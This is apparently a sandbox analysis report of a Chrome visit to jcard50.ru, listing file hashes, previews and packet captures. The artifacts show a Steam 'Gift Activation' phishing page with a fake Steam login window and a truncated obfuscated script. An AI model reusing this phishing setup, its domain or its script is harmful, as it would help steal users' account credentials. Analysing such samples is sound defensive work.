.F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jan 12 23:00:35 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2679
                Entropy (8bit):3.973739505202821
                Encrypted:false
                SSDEEP:48:8SdiTuueH1idAKZdA1weh/iZUkAQkqehMy+2:83ra9Q1y
                MD5:CA84C66032D6617623FF025CDE116C02
                SHA1:7DF3EFEF84771D35AE377DD59D7B8068505AA89E
                SHA-256:A29EA302A82190755CB077A5CA690F41478F904CE5F87B8DE8B49A1C3BC93159
                SHA-512:02FCB99E9590803E1C75E27AB82F9234B8B118B3732A7C0D14CB9301E38D849DF9676031BC219B33DC2075D12C95305322228B101639146FFB7784B5E0491025
                Malicious:false
                Reputation:low
                Preview:L..................F.@.. ...$+.,.......+Ne..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I-Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.........../1......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2693
                Entropy (8bit):3.992567275189478
                Encrypted:false
                SSDEEP:48:8xvdiTuusH1idAKZdA14tseh7sFiZUkmgqeh7sSy+BX:8xIrkngy
                MD5:1FE70A5F6DA8C1F3F24FC89BD50536E7
                SHA1:57A90557796D0C63C968FEEE06FD919D14BF7727
                SHA-256:3EDB10AD104375D875B4DFA1DDA2E491C74AF6871977344075B7A48A80251A18
                SHA-512:2EAF64FD2E508E42C4F7450FD8753CA4FFBE22C458D874826FB80609CAD7876006914A84272A649A5F07CBDB6922098F3493B0585AE816D59CF14A1A6DF1F94B
                Malicious:false
                Reputation:low
                Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I-Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.........../1......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jan 12 23:00:35 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2681
                Entropy (8bit):3.9726060436489017
                Encrypted:false
                SSDEEP:48:8ldiTuueH1idAKZdA1vehDiZUkwqehoy+R:8qrBay
                MD5:A51C3ED4BE5CDF3BEF611261705CA217
                SHA1:66C1D77E7678D56F4785CB295E2D82B1B6453D8C
                SHA-256:BBA6F1453EC6CC5E94913294CAA5ACB4275B2B415AF57B0CC5B6C9D139D561AB
                SHA-512:4591DCF829F50113B5E3A52EB961AC256A895BAB7E9518018C68645CCDE0F2AC23BE7F8FB6FC7187AF7C12C9E89662981A57AE57102FD78432A268FEEAB7AC9D
                Malicious:false
                Reputation:low
                Preview:L..................F.@.. ...$+.,....VF.+Ne..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I-Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.........../1......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jan 12 23:00:35 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2681
                Entropy (8bit):3.9631298457799002
                Encrypted:false
                SSDEEP:48:8rtzdiTuueH1idAKZdA1hehBiZUk1W1qeh2y+C:8rSrB9Wy
                MD5:4CB141F418CD42B81BFB159125C228E9
                SHA1:A9FEE49DD92FF60405D79E7A730DF3B62DA4B73D
                SHA-256:F5BB9905CB070AD6C9F90BE322E0CBFD376F502841581D9641276D9AAAA42F32
                SHA-512:D292864777B0E0CF76D97181A3457ABB500E2ECB34EB5A7BA3E6585979A98CD17F3171FD061FCCB60EE7E1B9E81E267F2CBE84288B6B52F00A4DBC7FF1EC09CC
                Malicious:false
                Reputation:low
                Preview:L..................F.@.. ...$+.,.......+Ne..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I-Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.........../1......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jan 12 23:00:35 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2683
                Entropy (8bit):3.9743278641167863
                Encrypted:false
                SSDEEP:48:8zdiTuueH1idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbgy+yT+:8Er9T/TbxWOvTbgy7T
                MD5:8BB8DEF7707B825CEE5FFCEBB12706D2
                SHA1:8EAAA766242FECC77C7649674200F92611D07274
                SHA-256:B58BB94D1F51016AE425009E6C8E4E67216AA0F46DD93D104177175D7749164F
                SHA-512:A968EFEF6D7B03AB4F5C7767FA4E76EC51A8A42E410B9A83824E5183B87DB40FDC58CE826A8C86A01BD8D49E8DB51E45A3847BFBDEFACED00748DE6038259300
                Malicious:false
                Reputation:low
                Preview:L..................F.@.. ...$+.,.......+Ne..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I-Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.........../1......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:JSON data
                Category:dropped
                Size (bytes):288
                Entropy (8bit):4.761938384522366
                Encrypted:false
                SSDEEP:6:YWQmDoHrx73iAvYOw36CQEngoM/eSEzXSvjDMqLM8ErBXjWORoR3C6:YWY1iiYOKDgovXSLDiVLoBT
                MD5:48963C9F80B88AB5566685214B81A002
                SHA1:0EB9B893643A1E4CE18E9ABD5B5C1990AED5237B
                SHA-256:C2FA696C6996869EEEB7B987B2A1D7D6A426CF1AB85EB6C782C07D580D36ABE7
                SHA-512:83D015011FB1D8DFBC6CF907A66EB89120F539193A2FBC2F4D164F95595253FE76614CC29E295C412D1948FA51405B03AC334BC6EC6D8C941C7AFC645DCA9E3A
                Malicious:false
                Reputation:low
                Preview:{"success":true,"service":"Steam","iframe":true,"timestamp":1736726445867.2537,"window":{"type":"FakeWindow","title":"Steam","url":"steamcommunity.com","path":"/login/home/?goto=","icon":"https://steamcommunity.com/favicon.ico"},"login":{},"browser":{"isDesktop":true,"isInternal":false}}
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:Web Open Font Format (Version 2), TrueType, length 29104, version 0.0
                Category:downloaded
                Size (bytes):29104
                Entropy (8bit):7.993786755731096
                Encrypted:true
                SSDEEP:768:9JxwZJhcx+M+6lxBZB3TRmltuaLuNo9aOjTC:uVcEM+Ayuaco9aOHC
                MD5:38A35C7070979FB4C845DE40CADA43C5
                SHA1:B0F804F348B746449E6589B92DFF685509737DAD
                SHA-256:FCFF4301DC083AF2BE2B990BB6485E9E06CE9D2B373A7ACF8A74F61EA69D861A
                SHA-512:E7E5B167FA9187EA785BE311F43E15F33D51C20E9D07E1E15E3A761A7B6A857B2AD270E3F0E6CB0D85327BC0AA3454646A2B5E040B30EDEDE216E57CC113F089
                Malicious:false
                Reputation:low
                URL:https://jcard50.ru/704a2a50755506000c594c1143057f6111412c207d07.woff2
                Preview:wOF2......q........x..qT.........................`..`....*..Y.....l..e.6.$.."..... ..s. ..S........@.<D.....I.....CB..j..~..?...?..G..9o.@...A.D~.>...i.-_.....N..q$.$.'Z...V...S./Q.\.PUx...<...i.7_../.y.1A...K\.M....=^......K.....5s......B...W.HQ]S..{...U...4..8....p.....tw;.v"...~.u..M.IL...s.&. ........y^7.d.A...+..a. ;.l..$$@.......p@....Q..;..X..u....;p...mm.....m.>.......q.....X..F......T.....pU..........z..U.j..DJr.a.2.w:..K..G.?.`.8..kw.C.U..Me..M5[B.t.R.S.........c..? i.......<`8..]..!..ARaS..T....J...uHaS..r..w..>.\..]..........3.B..\t..w...........!DP!C..J.#.|.p ..8..(....C.UV..m.j....J.]...ZLw~."A@...4...&.m..}#e...:..h8.."..N ...6$.%v...n..E.X.F.D....../.g..Zoo.........6*...X.#S...y5.(^.D..E..j....E.Y:t..7.0.5b,0a..3.p.#.p...8......7...;<..'...^r..\.|.|..~..... .@...`..B.B.E.a.'..D .HD..h..C.b.....C<.H ..$".$$...R.J*.HC:.. ..d.,;<.l..C.r..G. .|.P.B.QD..)F.%(..e...rTP.J*QE...F.5...u..z4.F..D..iF.-h..m...vt.N:.E...F.=..}...~X.b...2.!.0.0F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with no line terminators
                Category:downloaded
                Size (bytes):40
                Entropy (8bit):4.358694969562842
                Encrypted:false
                SSDEEP:3:mSpzB/CNCkuS1vY:mSpziuS1A
                MD5:E217090B911CC13ABEDBEB688CA1A554
                SHA1:CB009E959AB4F54411454EF6EB16E67D01580C04
                SHA-256:3F401608D8945004C0B649400BAD5E54956C6749DCA05BFEA15C7F2CBA996761
                SHA-512:3E47A536E0A758292CC3033B6706377F030B6ADD7ACBBD62AF5C145CE70094EA25CBD6B899F2BE557DE6B7899C50E7E41B331448F20688BEF77B91A70AE5E768
                Malicious:false
                Reputation:low
                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgnu8O2e1eeqPxIFDcpVNukSBQ1nZ7P-EgUNccm79Q==?alt=proto
                Preview:ChsKBw3KVTbpGgAKBw1nZ7P+GgAKBw1xybv1GgA=
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:HTML document, ASCII text, with very long lines (51510)
                Category:downloaded
                Size (bytes):72967
                Entropy (8bit):6.03760722848256
                Encrypted:false
                SSDEEP:1536:hG9/ngwT22Cjfr6h1ZDHa5KQyRPBXy1U0RzZko3b:81gwaf6dEURo5fb
                MD5:A9B13E59B040190121A43C85EF4899A1
                SHA1:27B92B6353C461007331455943CCF810C27E31AC
                SHA-256:D161E2AFB160A71D95530B2AD2CCF9A08D027296062EE5783ADD3F01BAD725D1
                SHA-512:BAD43D3FD1E4DBDD6D3540367044A5B7C4AF1DA14C491ABC71E30FEE439E70C2588DE7A857D740BD303FDF2AB0ACF187842D7F943CAC33C1F57FA5F9696A0CD3
                Malicious:false
                Reputation:low
                URL:https://jcard50.ru/e
                Preview:<!DOCTYPE html><html lang=""><head>..<meta charset="utf-8">..<meta name="viewport" content="width=device-width, initial-scale=1">..<style>. html,. body {. padding: 0;. margin: 0;. height: 100vh;. width: 100vw;. overflow: hidden;. }..</style>..<title>Gift Activation</title>. <meta property='og:title' content='Gift Activation'>. <link rel='shortcut icon' href='data:image/x-icon;filename=favicon.ico;base64,AAABAAUAEBAAAAEAIABoBAAAVgAAABgYAAABACAAiAkAAL4EAAAgIAAAAQAgAKgQAABGDgAAMDAAAAEAIACoJQAA7h4AAAAAAAABACAABFIAAJZEAAAoAAAAEAAAACAAAAABACAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACndRMApnQTB6l3E0isehOornwT5K99E/uvfRP7rnwT5Kx6E6ipdxNJpnQTB6d1EwAAAAAAAAAAAKNwEwCZZhMAmGUTGJxqE5KeaxHunmsP/59sEf+gbRP/oG4T/6BuE/+gbhP/n20T7pxqE5KYZRMYmWYTAKNxEgCNWhMAjVkTGJBdE7CSXxP/o3c2/7GMVP+lezv/kmAU/5JfE/+SXxP/kl8T/5JfE/+SXxP/kF0TsI1ZExiNWhMAfksVBoRQEpKDTw7/ontJ/8+6of/Mtpv/xa2P/6aAUP+FUhL/hlMU/4ZTFP+GUxT/hlMU/4ZTFP+FUhSSfksUBnRAD0mCUSHtoHtU/9/SxP/
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:Unicode text, UTF-8 text, with very long lines (53247), with no line terminators
                Category:dropped
                Size (bytes):53255
                Entropy (8bit):5.28830769967986
                Encrypted:false
                SSDEEP:768:7gm5ayf+ODUIyyoYH6CQRxaQ4vx2t3XX/D3dgl5C/BPzFmzhOaSfbV5YLFm7aLcL:IhYV2t3XbtjlahH6JNaG9LkXc
                MD5:60CDA3794671F81CE281D0F66610F8FA
                SHA1:F55977FF54C63CAE33E2EE770BE637FFF680DF80
                SHA-256:96CCE27E4825D7097A4F9E066803617E7C32AEFE22E8B0D1A65E9C9873BC59F1
                SHA-512:30DCBC23BEB9CD9BD3566E98C81DAF72FB27A06D2BCC83AF7917E0FA5693A718C90C086CE03C04B83D3A59404A955748003016A2E5316E3DB861A8AC1C431A56
                Malicious:false
                Reputation:low
                Preview:function _0x55d9(_0x13998d,_0x6ce82f){const _0x3ec274=_0x3ec2();return _0x55d9=function(_0x55d9d5,_0x1f8e12){_0x55d9d5=_0x55d9d5-0x14a;let _0x14859e=_0x3ec274[_0x55d9d5];return _0x14859e;},_0x55d9(_0x13998d,_0x6ce82f);}(function(_0x50d50e,_0x52454f){const _0x4326ef=_0x55d9,_0x47c149=_0x50d50e();while(!![]){try{const _0x4274c6=parseInt(_0x4326ef(0x259))/0x1*(parseInt(_0x4326ef(0x265))/0x2)+parseInt(_0x4326ef(0x235))/0x3*(parseInt(_0x4326ef(0x17a))/0x4)+parseInt(_0x4326ef(0x1a4))/0x5*(-parseInt(_0x4326ef(0x224))/0x6)+-parseInt(_0x4326ef(0x19e))/0x7*(parseInt(_0x4326ef(0x22b))/0x8)+-parseInt(_0x4326ef(0x15f))/0x9+parseInt(_0x4326ef(0x1cd))/0xa+parseInt(_0x4326ef(0x288))/0xb*(-parseInt(_0x4326ef(0x14e))/0xc);if(_0x4274c6===_0x52454f)break;else _0x47c149['push'](_0x47c149['shift']());}catch(_0x664591){_0x47c149['push'](_0x47c149['shift']());}}}(_0x3ec2,0xe59d7),((()=>{const _0x22b6f5=_0x55d9;var _0x17bd0f=Object[_0x22b6f5(0x19f)],_0x27c0a3=Object[_0x22b6f5(0x209)],_0x4c37c8=Object[_0x22b6f5
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:HTML document, ASCII text, with very long lines (51514)
                Category:downloaded
                Size (bytes):945854
                Entropy (8bit):5.760840923150303
                Encrypted:false
                SSDEEP:12288:fdmvcgNpHUR8/NMVEyl1ult+LsA0MRSfokRGOuaE8xCNpJxvu9rr3HBqdY+Z4LBb:ZgNX1cuUxxjWYyI7+
                MD5:669C62584EE1A80F9766AC8DCA3309E4
                SHA1:440C89E5EEE4B2EB123032D36E1E0BBA1EF5D822
                SHA-256:5ACC9AB3F9501A6D2303D8423DFFC34DC0A09F4062EE43FCBBE17047FBF90FF9
                SHA-512:390BDA0AB2835E4777E583F7E95680DD679101DE1008C7F1FF0CF617C22897B9D1EE297EFE9CD2DDBE53A764510AAA66BF8DED5BCFB43858A3CEE644A4FA6ECC
                Malicious:false
                Reputation:low
                URL:https://jcard50.ru/704a2a5075550603
                Preview:<html class=" responsive" lang="en" data-darkreader-mode="dynamic" data-darkreader-scheme="dark"><head><script async src='/704a2a507555060f0d535d1a.js'></script><script>window.triggers = []</script>. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <style>#__ClassicStart { display: none; }</style>. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">. <meta name="viewport" content="width=device-width,initial-scale=1">. <meta name="theme-color" content="#12151a">. <meta property="og:type" content="website">. <link rel="shortcut icon" href="data:image/x-icon;filename=favicon.ico;base64,AAABAAUAEBAAAAEAIABoBAAAVgAAABgYAAABACAAiAkAAL4EAAAgIAAAAQAgAKgQAABGDgAAMDAAAAEAIACoJQAA7h4AAAAAAAABACAABFIAAJZEAAAoAAAAEAAAACAAAAABACAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACndRMApnQTB6l3E0isehOornwT5K99E/uvfRP7rnwT5Kx6E6ipdxNJpnQTB6d1EwAAAAAAAAAAAKNwEwCZZhMAmGUTGJxqE5KeaxHunmsP/59sEf+gbRP/oG4T/6BuE/+gbhP/n20T7pxqE5KYZRMYmWYTAKN
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:JSON data
                Category:downloaded
                Size (bytes):288
                Entropy (8bit):4.757615077238211
                Encrypted:false
                SSDEEP:6:YWQmDoHrx73iAvhZ2Jff6CQEngoM/eSEzXSvjDMqLM8ErBXjWORoR3C6:YWY1iihZ2JffDgovXSLDiVLoBT
                MD5:FD2141F7E8C47C9F98461C68D7476523
                SHA1:32A3E6E171CCFE7925B34231B1F6F0A0E4F7AD18
                SHA-256:B4A26527FF7F4933ABB9346C9A1ABF5FC7D18CBF87240D626438F8976EE8DB39
                SHA-512:46F3897A01406FFDB5F0576472445399312E7BFE68D387BE2D54DBA9403CD81558C452D21CA66F0E960263730B7AB5F1606C319BB1D86349821BCEF113140971
                Malicious:false
                Reputation:low
                URL:https://jcard50.ru/704a2a507555060106436b0b12527a5d0a570803
                Preview:{"success":true,"service":"Steam","iframe":true,"timestamp":1736726444358.3435,"window":{"type":"FakeWindow","title":"Steam","url":"steamcommunity.com","path":"/login/home/?goto=","icon":"https://steamcommunity.com/favicon.ico"},"login":{},"browser":{"isDesktop":true,"isInternal":false}}
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:Unicode text, UTF-8 text, with very long lines (53247), with no line terminators
                Category:downloaded
                Size (bytes):53255
                Entropy (8bit):5.28830769967986
                Encrypted:false
                SSDEEP:768:7gm5ayf+ODUIyyoYH6CQRxaQ4vx2t3XX/D3dgl5C/BPzFmzhOaSfbV5YLFm7aLcL:IhYV2t3XbtjlahH6JNaG9LkXc
                MD5:60CDA3794671F81CE281D0F66610F8FA
                SHA1:F55977FF54C63CAE33E2EE770BE637FFF680DF80
                SHA-256:96CCE27E4825D7097A4F9E066803617E7C32AEFE22E8B0D1A65E9C9873BC59F1
                SHA-512:30DCBC23BEB9CD9BD3566E98C81DAF72FB27A06D2BCC83AF7917E0FA5693A718C90C086CE03C04B83D3A59404A955748003016A2E5316E3DB861A8AC1C431A56
                Malicious:false
                Reputation:low
                URL:https://jcard50.ru/704a2a507555060f0d535d1a.js
                Preview:function _0x55d9(_0x13998d,_0x6ce82f){const _0x3ec274=_0x3ec2();return _0x55d9=function(_0x55d9d5,_0x1f8e12){_0x55d9d5=_0x55d9d5-0x14a;let _0x14859e=_0x3ec274[_0x55d9d5];return _0x14859e;},_0x55d9(_0x13998d,_0x6ce82f);}(function(_0x50d50e,_0x52454f){const _0x4326ef=_0x55d9,_0x47c149=_0x50d50e();while(!![]){try{const _0x4274c6=parseInt(_0x4326ef(0x259))/0x1*(parseInt(_0x4326ef(0x265))/0x2)+parseInt(_0x4326ef(0x235))/0x3*(parseInt(_0x4326ef(0x17a))/0x4)+parseInt(_0x4326ef(0x1a4))/0x5*(-parseInt(_0x4326ef(0x224))/0x6)+-parseInt(_0x4326ef(0x19e))/0x7*(parseInt(_0x4326ef(0x22b))/0x8)+-parseInt(_0x4326ef(0x15f))/0x9+parseInt(_0x4326ef(0x1cd))/0xa+parseInt(_0x4326ef(0x288))/0xb*(-parseInt(_0x4326ef(0x14e))/0xc);if(_0x4274c6===_0x52454f)break;else _0x47c149['push'](_0x47c149['shift']());}catch(_0x664591){_0x47c149['push'](_0x47c149['shift']());}}}(_0x3ec2,0xe59d7),((()=>{const _0x22b6f5=_0x55d9;var _0x17bd0f=Object[_0x22b6f5(0x19f)],_0x27c0a3=Object[_0x22b6f5(0x209)],_0x4c37c8=Object[_0x22b6f5
                No static file info
                TimestampSource PortDest PortSource IPDest IP
                Jan 13, 2025 01:00:39.035867929 CET49719443192.168.2.5142.250.181.228
                Jan 13, 2025 01:00:39.035928011 CET44349719142.250.181.228192.168.2.5
                Jan 13, 2025 01:00:39.036067963 CET49719443192.168.2.5142.250.181.228
                Jan 13, 2025 01:00:39.036911011 CET49719443192.168.2.5142.250.181.228
                Jan 13, 2025 01:00:39.036928892 CET44349719142.250.181.228192.168.2.5
                Jan 13, 2025 01:00:39.677344084 CET44349719142.250.181.228192.168.2.5
                Jan 13, 2025 01:00:39.688585997 CET49719443192.168.2.5142.250.181.228
                Jan 13, 2025 01:00:39.688622952 CET44349719142.250.181.228192.168.2.5
                Jan 13, 2025 01:00:39.690234900 CET44349719142.250.181.228192.168.2.5
                Jan 13, 2025 01:00:39.690319061 CET49719443192.168.2.5142.250.181.228
                Jan 13, 2025 01:00:39.729706049 CET49719443192.168.2.5142.250.181.228
                Jan 13, 2025 01:00:39.729960918 CET44349719142.250.181.228192.168.2.5
                Jan 13, 2025 01:00:39.783229113 CET49719443192.168.2.5142.250.181.228
                Jan 13, 2025 01:00:39.783271074 CET44349719142.250.181.228192.168.2.5
                Jan 13, 2025 01:00:39.830141068 CET49719443192.168.2.5142.250.181.228
                Jan 13, 2025 01:00:40.382069111 CET49721443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:40.382112980 CET44349721104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:40.382572889 CET49721443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:40.382807016 CET49721443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:40.382819891 CET44349721104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:40.428026915 CET49722443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:40.428086996 CET44349722104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:40.428328037 CET49722443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:40.429121017 CET49722443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:40.429140091 CET44349722104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:40.881925106 CET44349721104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:40.882662058 CET49721443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:40.882673979 CET44349721104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:40.883697987 CET44349721104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:40.883785963 CET49721443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:40.888068914 CET49721443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:40.888360977 CET44349721104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:40.888364077 CET49721443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:40.888847113 CET44349722104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:40.889988899 CET49722443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:40.890033960 CET44349722104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:40.890916109 CET44349722104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:40.890996933 CET49722443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:40.891616106 CET49722443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:40.891684055 CET44349722104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:40.931339979 CET49721443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:40.931341887 CET49722443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:40.931360006 CET44349721104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:40.931374073 CET44349722104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:40.977818966 CET49721443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:40.977840900 CET49722443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:41.203092098 CET44349721104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:41.248481035 CET49721443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:41.248522043 CET44349721104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:41.291946888 CET49721443192.168.2.5104.21.32.1
                Jan 13, 2025 01:00:41.292536020 CET44349721104.21.32.1192.168.2.5
                Jan 13, 2025 01:00:41.292596102 CET44349721104.21.32.1192.168.2.5
